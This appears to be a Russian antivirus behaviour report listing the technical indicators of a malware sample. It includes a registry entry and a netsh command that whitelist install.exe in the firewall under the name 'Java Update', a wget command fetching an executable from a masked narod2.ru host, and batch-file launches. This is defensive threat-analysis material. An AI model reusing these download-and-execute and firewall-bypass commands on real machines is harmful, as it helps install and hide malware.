Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '%WINDIR%\install.exe' = '%WINDIR%\install.exe:*:Enabled:Java Update'
- %TEMP%\2.tmp\msiexec.exe
- %TEMP%\2.tmp\wget.exe http://et####ant.narod2.ru/msiexec.exe
- %WINDIR%\install.exe
- %TEMP%\2.tmp\msiexec.exe (загружен из сети Интернет)
- <SYSTEM32>\ping.exe ya.ru -n 5
- <SYSTEM32>\taskkill.exe /f /im install.exe
- <SYSTEM32>\cmd.exe /c ""%TEMP%\2.tmp\install.bat" "
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\setup.bat" "
- <SYSTEM32>\netsh.exe firewall add allowedprogram "%WINDIR%\install.exe" "Java Update" ENABLE
- %TEMP%\2.tmp\install.bat
- %TEMP%\2.tmp\wget.exe
- %TEMP%\2.tmp\msiexec.exe
- %TEMP%\1.tmp\setup.bat
- %TEMP%\1.tmp\install.exe
- %WINDIR%\install.exe
- %WINDIR%\install.exe
- %TEMP%\1.tmp\setup.bat
- %TEMP%\1.tmp\install.exe
- 'et####ant.narod2.ru':80
- et####ant.narod2.ru/msiexec.exe
- DNS ASK et####ant.narod2.ru
- DNS ASK ya.ru
- ClassName: '' WindowName: ''